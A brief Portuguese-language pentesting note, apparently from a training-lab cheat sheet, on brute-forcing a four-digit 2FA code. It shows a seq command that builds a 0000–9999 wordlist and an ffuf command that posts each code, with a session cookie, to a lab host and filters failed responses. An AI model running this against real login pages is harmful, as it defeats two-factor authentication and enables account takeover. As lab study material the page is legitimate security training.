Brute-Forcing 2FA Codes

Gerar uma lista de palavras contendo todos os números de 4 dígitos de 0000para 9999assim:

seq -w 0 9999 > tokens.txt

Depois, podemos usar o seguinte comando para forçar brutamente o TOTP correto, filtrando as respostas que contêm a Invalid 2FA Codemensagem de erro:

ffuf -w ./tokens.txt -u http://bf_2fa.htb/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=fpfcm5b8dh1ibfa7idg0he7l93" -d "otp=FUZZ" -fr "Invalid 2FA Code"

PreviousBrute-Forcing Password Reset Tokens NextDefault Credentials

Last updated 1 year ago